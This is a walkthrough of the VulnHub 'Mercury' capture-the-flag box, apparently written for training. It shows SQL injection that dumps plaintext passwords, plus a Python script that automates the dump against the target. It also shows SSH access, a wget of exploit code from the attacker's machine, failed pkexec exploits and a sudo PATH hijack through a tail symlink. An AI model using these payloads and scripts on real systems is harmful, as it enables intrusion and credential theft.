The Planets: Mercury
Author: jason_huawen
Target machine information
Name: The Planets: Mercury
URL:
https://www.vulnhub.com/entry/the-planets-mercury,544/
Identifying the target host's IP address
┌──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.76.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:9e:f5:5c 1 60 PCS Systemtechnik GmbH
192.168.56.226 08:00:27:ff:54:84 1 60 PCS Systemtechnik GmbH
netdiscover (bundled with Kali Linux) identifies the target's IP address as 192.168.56.226: 192.168.56.1 is the host's own host-only adapter and 192.168.56.100 is VirtualBox's DHCP server, so .226 is the only candidate.
Nmap scan
┌──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.226 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-26 23:03 EST
Nmap scan report for localhost (192.168.56.226)
Host is up (0.00010s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c8:24:ea:2a:2b:f1:3c:fa:16:94:65:bd:c7:9b:6c:29 (RSA)
| 256 e8:08:a1:8e:7d:5a:bc:5c:66:16:48:24:57:0d:fa:b8 (ECDSA)
|_ 256 2f:18:7e:10:54:f7:b9:17:a2:11:1d:8f:b3:30:a5:2a (ED25519)
8080/tcp open http-proxy WSGIServer/0.2 CPython/3.8.2
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404 Not Found
| Date: Sun, 27 Nov 2022 04:03:14 GMT
| Server: WSGIServer/0.2 CPython/3.8.2
| Content-Type: text/html
| X-Frame-Options: DENY
| Content-Length: 2366
| X-Content-Type-Options: nosniff
| Referrer-Policy: same-origin
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta http-equiv="content-type" content="text/html; charset=utf-8">
| <title>Page not found at /nice ports,/Trinity.txt.bak</title>
| <meta name="robots" content="NONE,NOARCHIVE">
| <style type="text/css">
| html * { padding:0; margin:0; }
| body * { padding:10px 20px; }
| body * * { padding:0; }
| body { font:small sans-serif; background:#eee; color:#000; }
| body>div { border-bottom:1px solid #ddd; }
| font-weight:normal; margin-bottom:.4em; }
| span { font-size:60%; color:#666; font-weight:normal; }
| table { border:none; border-collapse: collapse; width:100%; }
| vertical-align:
| GetRequest, HTTPOptions:
| HTTP/1.1 200 OK
| Date: Sun, 27 Nov 2022 04:03:14 GMT
| Server: WSGIServer/0.2 CPython/3.8.2
| Content-Type: text/html; charset=utf-8
| X-Frame-Options: DENY
| Content-Length: 69
| X-Content-Type-Options: nosniff
| Referrer-Policy: same-origin
| Hello. This site is currently in development please check back later.
| RTSPRequest:
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
| "http://www.w3.org/TR/html4/strict.dtd">
| <html>
| <head>
| <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
| <title>Error response</title>
| </head>
| <body>
| <h1>Error response</h1>
| <p>Error code: 400</p>
| <p>Message: Bad request version ('RTSP/1.0').</p>
| <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
| </body>
|_ </html>
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-server-header: WSGIServer/0.2 CPython/3.8.2
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.92%I=7%D=11/26%Time=6382E184%P=x86_64-pc-linux-gnu%r(G
SF:etRequest,135,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Sun,\x2027\x20Nov\x20
SF:2022\x2004:03:14\x20GMT\r\nServer:\x20WSGIServer/0\.2\x20CPython/3\.8\.
SF:2\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nX-Frame-Options:\x
SF:20DENY\r\nContent-Length:\x2069\r\nX-Content-Type-Options:\x20nosniff\r
SF:\nReferrer-Policy:\x20same-origin\r\n\r\nHello\.\x20This\x20site\x20is\
SF:x20currently\x20in\x20development\x20please\x20check\x20back\x20later\.
SF:")%r(HTTPOptions,135,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Sun,\x2027\x20
SF:Nov\x202022\x2004:03:14\x20GMT\r\nServer:\x20WSGIServer/0\.2\x20CPython
SF:/3\.8\.2\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nX-Frame-Opt
SF:ions:\x20DENY\r\nContent-Length:\x2069\r\nX-Content-Type-Options:\x20no
SF:sniff\r\nReferrer-Policy:\x20same-origin\r\n\r\nHello\.\x20This\x20site
SF:\x20is\x20currently\x20in\x20development\x20please\x20check\x20back\x20
SF:later\.")%r(RTSPRequest,1F4,"<!DOCTYPE\x20HTML\x20PUBLIC\x20\"-//W3C//D
SF:TD\x20HTML\x204\.01//EN\"\n\x20\x20\x20\x20\x20\x20\x20\x20\"http://www
SF:\.w3\.org/TR/html4/strict\.dtd\">\n<html>\n\x20\x20\x20\x20<head>\n\x20
SF:\x20\x20\x20\x20\x20\x20\x20<meta\x20http-equiv=\"Content-Type\"\x20con
SF:tent=\"text/html;charset=utf-8\">\n\x20\x20\x20\x20\x20\x20\x20\x20<tit
SF:le>Error\x20response</title>\n\x20\x20\x20\x20</head>\n\x20\x20\x20\x20
SF:<body>\n\x20\x20\x20\x20\x20\x20\x20\x20<h1>Error\x20response</h1>\n\x2
SF:0\x20\x20\x20\x20\x20\x20\x20<p>Error\x20code:\x20400</p>\n\x20\x20\x20
SF:\x20\x20\x20\x20\x20<p>Message:\x20Bad\x20request\x20version\x20\('RTSP
SF:/1\.0'\)\.</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20code\x20exp
SF:lanation:\x20HTTPStatus\.BAD_REQUEST\x20-\x20Bad\x20request\x20syntax\x
SF:20or\x20unsupported\x20method\.</p>\n\x20\x20\x20\x20</body>\n</html>\n
SF:")%r(FourOhFourRequest,A28,"HTTP/1\.1\x20404\x20Not\x20Found\r\nDate:\x
SF:20Sun,\x2027\x20Nov\x202022\x2004:03:14\x20GMT\r\nServer:\x20WSGIServer
SF:/0\.2\x20CPython/3\.8\.2\r\nContent-Type:\x20text/html\r\nX-Frame-Optio
SF:ns:\x20DENY\r\nContent-Length:\x202366\r\nX-Content-Type-Options:\x20no
SF:sniff\r\nReferrer-Policy:\x20same-origin\r\n\r\n<!DOCTYPE\x20html>\n<ht
SF:ml\x20lang=\"en\">\n<head>\n\x20\x20<meta\x20http-equiv=\"content-type\
SF:"\x20content=\"text/html;\x20charset=utf-8\">\n\x20\x20<title>Page\x20n
SF:ot\x20found\x20at\x20/nice\x20ports,/Trinity\.txt\.bak</title>\n\x20\x2
SF:0<meta\x20name=\"robots\"\x20content=\"NONE,NOARCHIVE\">\n\x20\x20<styl
SF:e\x20type=\"text/css\">\n\x20\x20\x20\x20html\x20\*\x20{\x20padding:0;\
SF:x20margin:0;\x20}\n\x20\x20\x20\x20body\x20\*\x20{\x20padding:10px\x202
SF:0px;\x20}\n\x20\x20\x20\x20body\x20\*\x20\*\x20{\x20padding:0;\x20}\n\x
SF:20\x20\x20\x20body\x20{\x20font:small\x20sans-serif;\x20background:#eee
SF:;\x20color:#000;\x20}\n\x20\x20\x20\x20body>div\x20{\x20border-bottom:1
SF:px\x20solid\x20#ddd;\x20}\n\x20\x20\x20\x20h1\x20{\x20font-weight:norma
SF:l;\x20margin-bottom:\.4em;\x20}\n\x20\x20\x20\x20h1\x20span\x20{\x20fon
SF:t-size:60%;\x20color:#666;\x20font-weight:normal;\x20}\n\x20\x20\x20\x2
SF:0table\x20{\x20border:none;\x20border-collapse:\x20collapse;\x20width:1
SF:00%;\x20}\n\x20\x20\x20\x20td,\x20th\x20{\x20vertical-align:");
MAC Address: 08:00:27:FF:54:84 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 94.61 seconds
The Nmap scan shows two open ports: 22 (OpenSSH 8.2p1, Ubuntu 20.04) and 8080 (a Python WSGIServer, which the later debug page reveals to be a Django development server). robots.txt disallows everything, and the 404 body is Django's own.
Get Access
┌──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$ curl http://192.168.56.226:8080/
Hello. This site is currently in development please check back later.
┌──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$ curl http://192.168.56.226:8080/robots.txt
User-agent: *
Disallow: /
┌──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$ nikto -h http://192.168.56.226:8080
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.226
+ Target Hostname: 192.168.56.226
+ Target Port: 8080
+ Start Time: 2022-11-26 23:17:00 (GMT-5)
---------------------------------------------------------------------------
+ Server: WSGIServer/0.2 CPython/3.8.2
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-17113: /SilverStream: SilverStream allows directory listing
+ Server banner has changed from 'WSGIServer/0.2 CPython/3.8.2' to 'WSGIServer/0.2 Python/3.8.2' which may suggest a WAF, load balancer or proxy is in place
+ 7928 requests: 0 error(s) and 2 item(s) reported on remote host
+ End Time: 2022-11-26 23:17:52 (GMT-5) (52 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (WSGIServer/0.2) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to [email protected]) (y/n)?
Nikto flagged a /SilverStream path (a generic signature check), so request it directly:
┌──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$ curl http://192.168.56.226:8080/SilverStream/
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<title>Page not found at /SilverStream/</title>
<meta name="robots" content="NONE,NOARCHIVE">
<style type="text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; background:#eee; color:#000; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; margin-bottom:.4em; }
h1 span { font-size:60%; color:#666; font-weight:normal; }
table { border:none; border-collapse: collapse; width:100%; }
td, th { vertical-align:top; padding:2px 3px; }
th { width:12em; text-align:right; color:#666; padding-right:.5em; }
#info { background:#f6f6f6; }
#info ol { margin: 0.5em 4em; }
#info ol li { font-family: monospace; }
#summary { background: #ffc; }
#explanation { background:#eee; border-bottom: 0px none; }
</style>
</head>
<body>
<div id="summary">
<h1>Page not found <span>(404)</span></h1>
<table class="meta">
<tr>
<th>Request Method:</th>
<td>GET</td>
</tr>
<tr>
<th>Request URL:</th>
<td>http://192.168.56.226:8080/SilverStream/</td>
</tr>
</table>
</div>
<div id="info">
<p>
Using the URLconf defined in <code>mercury_proj.urls</code>,
Django tried these URL patterns, in this order:
</p>
<ol>
<li>
[name='index']
</li>
<li>
robots.txt
[name='robots']
</li>
<li>
mercuryfacts/
</li>
</ol>
<p>
The current path, <code>SilverStream/</code>, didn't match any of these.
</p>
</div>
<div id="explanation">
<p>
You're seeing this error because you have <code>DEBUG = True</code> in
your Django settings file. Change that to <code>False</code>, and Django
will display a standard 404 page.
</p>
</div>
</body>
</html>
The response is a 404, but because the application runs with DEBUG = True, Django's debug 404 page lists every URL pattern in mercury_proj.urls, which exposes the otherwise unlinked path mercuryfacts/. (The fix is the one the page itself states: set DEBUG = False in settings.py for anything reachable over the network.) /SilverStream itself is a Nikto false positive; the information leak is what matters.
Request that path:
┌──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$ curl http://192.168.56.226:8080/mercuryfacts/
<html>
<head>
<title> Mercury Facts </title>
</head>
<body>
<img src="/static/mercury_facts/mercury_1.jpg" alt="Picture of Mercury" width="400" height="400">
<br />
Still in development.
<ul>
<li> Mercury Facts: <a href='/mercuryfacts/1'> Load a fact. </a> </li>
<li> Website Todo List: <a href='/mercuryfacts/todo'> See list. </a> </li>
</ul>
</body>
</html>
┌──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$ curl http://192.168.56.226:8080/mercuryfacts/todo
<html>
<head>
<title> Mercury Facts Todo </title>
</head>
<body>
Still todo:
<ul>
<li> Add CSS. </li>
<li> Implement authentication (using users table)</li>
<li> Use models in django instead of direct mysql call</li>
<li> All the other stuff, so much!!! </li>
</ul>
</body>
</html>
The hints left by the box author say that the application currently talks to MySQL directly instead of going through Django models (the ORM), so hand-built SQL and therefore SQL injection are likely.
/mercuryfacts/1 returns a different fact for each number in the path; is the number being pasted into a query? Test it:
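The following is an added example, not code from the box (its views.py is never shown in this write-up): a hypothetical reconstruction of the kind of view the todo list points at, a direct SQL call with the URL value pasted into the query text, next to its parameterised form. SQLite in memory stands in for the box's MySQL so the snippet runs offline; the table and column names are the ones the injection below reveals, the row contents are constructed.

```python
"""Added example: string-built SQL (injectable) beside a bound-parameter query.
Hypothetical view code; the box's real views.py is not shown in the write-up.
SQLite in memory replaces MySQL so it runs offline. Row contents are constructed."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Tables named as the injection later reveals them (facts, users)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        create table facts(id integer primary key, fact text);
        create table users(id integer primary key, username text, password text);
        insert into facts values (1, 'Mercury does not have any moons or rings.');
        insert into users values (1, 'john', 'johnny1987');
    """)
    return con


def fact_vulnerable(con: sqlite3.Connection, fact_id: str) -> str:
    """String-built query: everything after the number in the URL is executed as SQL.
    The response echoes the id and the raw fetchall() result, like the box does
    (sqlite returns a list of tuples where the MySQL driver returned a tuple of tuples)."""
    cur = con.execute(f"select fact from facts where id = {fact_id}")
    return f"Fact id: {fact_id}. {cur.fetchall()}"


def fact_parameterised(con: sqlite3.Connection, fact_id: str) -> str:
    """Fix: validate the type, then bind the value so the driver never parses it as SQL."""
    if not fact_id.isdigit():
        raise ValueError("fact id must be an integer")
    cur = con.execute("select fact from facts where id = ?", (int(fact_id),))
    return f"Fact id: {fact_id}. {cur.fetchall()}"


# The write-up's payload shape, pointed at the users table.
PAYLOAD = "1 and 1=2 union select password from users"


def demo() -> dict:
    """Same input through both views: the vulnerable one leaks john's password."""
    con = make_db()
    try:
        fixed = fact_parameterised(con, PAYLOAD)
    except ValueError as e:
        fixed = f"rejected: {e}"
    return {
        "normal": fact_vulnerable(con, "1"),
        "injected": fact_vulnerable(con, PAYLOAD),
        "fixed": fixed,
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

In Django the same binding is available without the ORM: `cursor.execute("select fact from facts where id = %s", [fact_id])` on a connection cursor passes the value as a parameter, which is the smallest change that closes this hole while the "use models" todo item is still open.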
http://192.168.56.226:8080/mercuryfacts/1 order by 1/
Fact id: 1 order by 1. (('Mercury does not have any moons or rings.',),)
ORDER BY 1 is accepted and the echoed result is a single-column tuple, so the query returns one column. Note that the page prints the injected id and the raw fetchall() result, which makes extraction trivial.
http://192.168.56.226:8080/mercuryfacts/1 and 1%3D2 union select database()/
Fact id: 1 and 1=2 union select database(). (('mercury',),)
The database is named mercury.
Fact id: 1 and 1=2 union select table_name from information_schema.tables where table_schema=database() limit 0,1. (('facts',),)
The first table is facts.
Fact id: 1 and 1=2 union select table_name from information_schema.tables where table_schema=database() limit 1,1. (('users',),)
The second table is users.
Next, the column names of the users table:
Fact id: 1 and 1=2 union select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1. (('id',),)
The first column is id.
Fact id: 1 and 1=2 union select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 1,1. (('password',),)
The second column is password.
Fact id: 1 and 1=2 union select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 2,1. (('username',),)
The third column is username.
Now dump the rows of the table:
Fact id: 1 and 1=2 union select concat(username,0x7e,password) from users limit 0,1. (('john~johnny1987',),)
Fact id: 1 and 1=2 union select concat(username,0x7e,password) from users limit 1,1. (('laura~lovemykids111',),)
Fact id: 1 and 1=2 union select concat(username,0x7e,password) from users limit 2,1. (('sam~lovemybeer111',),)
Fact id: 1 and 1=2 union select concat(username,0x7e,password) from users limit 3,1. (('webmaster~mercuryisthesizeof0.056Earths',),)
Manual SQL injection has recovered every username and password; the passwords are stored in plaintext, not hashed:
┌──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$ cat username_and_password
webmaster mercuryisthesizeof0.056Earths
sam lovemybeer111
laura lovemykids111
john johnny1987
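As an added example (not part of the original write-up), the extraction chain above automated: the payload builder and the parser for the page's `Fact id: ... (('value',),)` echo are separated from the transport, so they run offline against constructed responses shaped like the ones shown above, and `http_fetch` can be swapped in to run the same chain against the box. The GROUP_CONCAT enumeration is my shortcut for the LIMIT n,1 stepping used by hand.

```python
"""Added example: automate the UNION-based extraction performed by hand above.
Transport sits behind a `fetch` callable; fake_fetch answers with constructed
responses in the shape the box echoes, http_fetch talks to the real target."""
import ast
import re
import urllib.parse
import urllib.request
from typing import Callable, Dict, List

TARGET = "http://192.168.56.226:8080/mercuryfacts/"   # the box's URL from the write-up

# The view echoes the injected id, a full stop, then repr(cursor.fetchall()):
#   Fact id: 1 and 1=2 union select database(). (('mercury',),)
# Match from the first ". (" to the end of the body (none of the payloads used here contain ". (").
TAIL_RE = re.compile(r"\. (\(.*\))\s*$", re.S)

Fetch = Callable[[str], str]


def http_fetch(injected_id: str) -> str:
    """Real transport: GET /mercuryfacts/<payload>/ and return the body as text."""
    url = TARGET + urllib.parse.quote(injected_id, safe="") + "/"
    with urllib.request.urlopen(url, timeout=10) as resp:
        return resp.read().decode("utf-8", "replace")


def union_payload(select_expr: str) -> str:
    """Single-column UNION payload as used in the write-up: '1 and 1=2' makes the
    legitimate WHERE clause false so only the UNIONed row(s) come back."""
    return f"1 and 1=2 union {select_expr}"


def parse_rows(body: str) -> List[str]:
    """Return the first column of every row in the echoed fetchall() tuple."""
    m = TAIL_RE.search(body)
    if m is None:
        raise ValueError(f"unexpected response: {body[:80]!r}")
    rows = ast.literal_eval(m.group(1))   # literals only, never eval()
    return [str(row[0]) for row in rows]


def query(fetch: Fetch, select_expr: str) -> List[str]:
    return parse_rows(fetch(union_payload(select_expr)))


def dump_users(fetch: Fetch) -> Dict[str, object]:
    """The manual chain: database name, table list, columns of users, then credentials.
    GROUP_CONCAT (MySQL) folds each enumeration into one request instead of LIMIT n,1."""
    db = query(fetch, "select database()")[0]
    tables = query(fetch, "select group_concat(table_name) from information_schema.tables "
                          "where table_schema=database()")[0].split(",")
    columns = query(fetch, "select group_concat(column_name) from information_schema.columns "
                           "where table_schema=database() and table_name='users'")[0].split(",")
    creds = query(fetch, "select concat(username,0x7e,password) from users")
    users = dict(c.split("~", 1) for c in creds)
    return {"database": db, "tables": tables, "columns": columns, "users": users}


# Constructed offline stand-in for the box; values mirror what the write-up recovered.
_CANNED = [
    ("information_schema.tables", "(('facts,users',),)"),
    ("information_schema.columns", "(('id,password,username',),)"),
    ("from users", "(('john~johnny1987',),('laura~lovemykids111',),"
                   "('sam~lovemybeer111',),('webmaster~mercuryisthesizeof0.056Earths',),)"),
    ("database()", "(('mercury',),)"),
]


def fake_fetch(injected_id: str) -> str:
    """Answer like the box would; order matters, later needles are substrings of earlier queries."""
    for needle, answer in _CANNED:
        if needle in injected_id:
            return f"Fact id: {injected_id}. {answer}"
    raise KeyError(injected_id)


def demo() -> Dict[str, object]:
    """Run the chain against the canned responses; pass http_fetch to hit the box instead."""
    return dump_users(fake_fetch)


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```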
There is no login page on port 8080 yet, so these may well be SSH credentials; try them there.
After trying every username with its password, only webmaster logs in successfully:
┌──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$ ls
nmap_full_scan username_and_password
┌──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$ ssh [email protected]
The authenticity of host '192.168.56.226 (192.168.56.226)' can't be established.
ED25519 key fingerprint is SHA256:mHhkDLhyH54cYFlptygnwr7NYpEtepsNhVAT8qzqcUk.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.226' (ED25519) to the list of known hosts.
[email protected]'s password:
Permission denied, please try again.
[email protected]'s password:
┌──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$ ssh [email protected]
[email protected]'s password:
Permission denied, please try again.
[email protected]'s password:
┌──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$ ssh [email protected]
[email protected]'s password:
Permission denied, please try again.
[email protected]'s password:
┌──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$ ssh [email protected]
[email protected]'s password:
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-45-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information disabled due to load higher than 1.0
22 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Tue Sep 1 13:57:14 2020 from 192.168.31.136
webmaster@mercury:~$
webmaster@mercury:~$ cat user_flag.txt
[user_flag_8339915c9a454657bd60ee58776f4ccd]
webmaster@mercury:~$ cd mercury_proj/
webmaster@mercury:~/mercury_proj$ ls -alh
total 28K
drwxrwxr-x 5 webmaster webmaster 4.0K Aug 28 2020 .
drwx------ 4 webmaster webmaster 4.0K Sep 2 2020 ..
-rw-r--r-- 1 webmaster webmaster 0 Aug 27 2020 db.sqlite3
-rwxr-xr-x 1 webmaster webmaster 668 Aug 27 2020 manage.py
drwxrwxr-x 6 webmaster webmaster 4.0K Sep 1 2020 mercury_facts
drwxrwxr-x 4 webmaster webmaster 4.0K Aug 28 2020 mercury_index
drwxrwxr-x 3 webmaster webmaster 4.0K Aug 28 2020 mercury_proj
-rw------- 1 webmaster webmaster 196 Aug 28 2020 notes.txt
webmaster@mercury:~/mercury_proj$ cat notes.txt
Project accounts (both restricted):
webmaster for web stuff - webmaster:bWVyY3VyeWlzdGhlc2l6ZW9mMC4wNTZFYXJ0aHMK
linuxmaster for linux stuff - linuxmaster:bWVyY3VyeW1lYW5kaWFtZXRlcmlzNDg4MGttCg==
webmaster@mercury:~/mercury_proj$ cd mercury_facts/
webmaster@mercury:~/mercury_proj/mercury_facts$ ls -alh
total 48K
drwxrwxr-x 6 webmaster webmaster 4.0K Sep 1 2020 .
drwxrwxr-x 5 webmaster webmaster 4.0K Aug 28 2020 ..
-rw-r--r-- 1 webmaster webmaster 63 Aug 27 2020 admin.py
-rw-r--r-- 1 webmaster webmaster 100 Aug 27 2020 apps.py
-rw-r--r-- 1 webmaster webmaster 0 Aug 27 2020 __init__.py
drwxrwxr-x 3 webmaster webmaster 4.0K Aug 28 2020 migrations
-rw-r--r-- 1 webmaster webmaster 57 Aug 27 2020 models.py
drwxrwxr-x 2 webmaster webmaster 4.0K Aug 28 2020 __pycache__
drwxrwxr-x 3 webmaster webmaster 4.0K Sep 1 2020 static
drwxrwxr-x 3 webmaster webmaster 4.0K Aug 28 2020 templates
-rw-r--r-- 1 webmaster webmaster 60 Aug 27 2020 tests.py
-rw-rw-r-- 1 webmaster webmaster 369 Aug 28 2020 urls.py
-rw-r--r-- 1 webmaster webmaster 637 Aug 28 2020 views.py
notes.txt holds base64-encoded passwords for both project accounts (the webmaster one decodes to the password already recovered from the database). Decode the linuxmaster one and switch to that user with it:
┌──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$ echo "bWVyY3VyeW1lYW5kaWFtZXRlcmlzNDg4MGttCg==" |base64 -d
mercurymeandiameteris4880km
linuxmaster@mercury:/home$ sudo -l
Matching Defaults entries for linuxmaster on mercury:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User linuxmaster may run the following commands on mercury:
(root : root) SETENV: /usr/bin/check_syslog.sh
Privilege escalation
linuxmaster@mercury:/home$ find / -perm -4000 -type f 2>/dev/null
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/chfn
/usr/bin/at
/usr/bin/pkexec
/usr/bin/umount
/usr/bin/fusermount
/usr/bin/passwd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
Try escalating through the last entry in the list (polkit), using this pkexec exploit:
https://www.exploit-db.com/exploits/17932
linuxmaster@mercury:/tmp$ wget http://192.168.56.206:8000/17932.c
--2022-11-27 05:23:26-- http://192.168.56.206:8000/17932.c
Connecting to 192.168.56.206:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3492 (3.4K) [text/x-csrc]
Saving to: ‘17932.c’
17932.c 100%[====================================================>] 3.41K --.-KB/s in 0s
2022-11-27 05:23:26 (715 MB/s) - ‘17932.c’ saved [3492/3492]
linuxmaster@mercury:/tmp$ ls
17932.c
linpeas.sh
systemd-private-03a2003400454137ae070720e9620284-systemd-logind.service-BZzHpg
systemd-private-03a2003400454137ae070720e9620284-systemd-resolved.service-EzwFLg
systemd-private-03a2003400454137ae070720e9620284-systemd-timesyncd.service-CmPcsi
tmux-1002
linuxmaster@mercury:/tmp$ gcc 17932.c -o exploit
linuxmaster@mercury:/tmp$ ls
17932.c systemd-private-03a2003400454137ae070720e9620284-systemd-logind.service-BZzHpg tmux-1002
exploit systemd-private-03a2003400454137ae070720e9620284-systemd-resolved.service-EzwFLg
linpeas.sh systemd-private-03a2003400454137ae070720e9620284-systemd-timesyncd.service-CmPcsi
linuxmaster@mercury:/tmp$ chmod +x exploit
linuxmaster@mercury:/tmp$ ./exploit
=============================
= PolicyKit Pwnage =
= by zx2c4 =
= Sept 2, 2011 =
=============================
[+] Configuring inotify for proper pid.
[+] Launching pkexec.
linuxmaster@mercury:/tmp$
Escalation failed; this exploit code does not work here. EDB-17932 is the 2011 pkexec race condition (CVE-2011-1485), which this Ubuntu 20.04 polkit build is not expected to have.
Switch to a different exploit:
┌──(kali㉿kali)-[~/Vulnhub/Mercury]
└─$ ls
17932.c CVE-2021-4034-main cve.tar.gz nmap_full_scan
cve-2021-4034.c CVE-2021-4034-main.zip linpeas.sh username_and_password
The target has no zip/unzip command, so the exploit is packed with tar and uploaded:
linuxmaster@mercury:/tmp$ ls
17932.c cve.tar.gz systemd-private-03a2003400454137ae070720e9620284-systemd-logind.service-BZzHpg
cve-2021-4034.c exploit systemd-private-03a2003400454137ae070720e9620284-systemd-resolved.service-EzwFLg
CVE-2021-4034-main exploit2 systemd-private-03a2003400454137ae070720e9620284-systemd-timesyncd.service-CmPcsi
CVE-2021-4034-main.zip linpeas.sh tmux-1002
linuxmaster@mercury:/tmp$ cd CVE-2021-4034-main/
linuxmaster@mercury:/tmp/CVE-2021-4034-main$ ls
cve-2021-4034.sh dry-run LICENSE Makefile pwnkit.c README.md
linuxmaster@mercury:/tmp/CVE-2021-4034-main$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cat cve-2021-4034.sh >cve-2021-4034
chmod a+x cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /usr/bin/true GCONV_PATH=./pwnkit.so:.
linuxmaster@mercury:/tmp/CVE-2021-4034-main$ ls
cve-2021-4034 dry-run 'GCONV_PATH=.' Makefile pwnkit.so
cve-2021-4034.sh gconv-modules LICENSE pwnkit.c README.md
linuxmaster@mercury:/tmp/CVE-2021-4034-main$ ./cve-2021-4034
make: *** No targets. Stop.
Running it does not succeed either (the script hands off to make, which finds no targets), so this route is a dead end. The command allowed by sudo -l is the intended direction for escalation:
linuxmaster@mercury:~$ cat /usr/bin/check_syslog.sh
#!/bin/bash
tail -n 10 /var/log/syslog
Note that tail is invoked without an absolute path, so tail is the thing to attack. check_syslog.sh itself is only readable to us, so the script cannot be edited; the alternative is to put our own tail first in PATH, which the SETENV tag on the sudoers entry makes possible. Partial ls -alh /tmp output (truncated at the top):
vice-CmPcsi
lrwxrwxrwx 1 linuxmaster linuxmaster 12 Nov 27 05:47 tail -> /usr/bin/vim
drwxrwxrwt 2 root root 4.0K Nov 27 04:00 .Test-unix
drwx------ 2 linuxmaster linuxmaster 4.0K Nov 27 05:16 tmux-1002
drwxrwxrwt 2 root root 4.0K Nov 27 04:00 .X11-unix
drwxrwxrwt 2 root root 4.0K Nov 27 04:00 .XIM-unix
linuxmaster@mercury:/tmp$ ln -s /usr/bin/vim tail
linuxmaster@mercury:/tmp$ export PATH=$(pwd):$PATH
linuxmaster@mercury:/tmp$ sudo --preserve-env=PATH /usr/bin/check_syslog.sh
Nov 27 05:30:11 mercury systemd-timesyncd[470]: Network configuration changed, trying to establish connection.
Nov 27 05:34:27 mercury kernel: [ 5651.595118] cgroup: fork rejected by pids controller in /user.slice/user-1001.slice/session-2.scope
Nov 27 05:35:09 mercury systemd-networkd[358]: enp0s3: DHCP: No gateway received from DHCP server.
Nov 27 05:35:09 mercury systemd-timesyncd[470]: Network configuration changed, trying to establish connection.
Nov 27 05:40:09 mercury systemd-networkd[358]: enp0s3: DHCP: No gateway received from DHCP server.
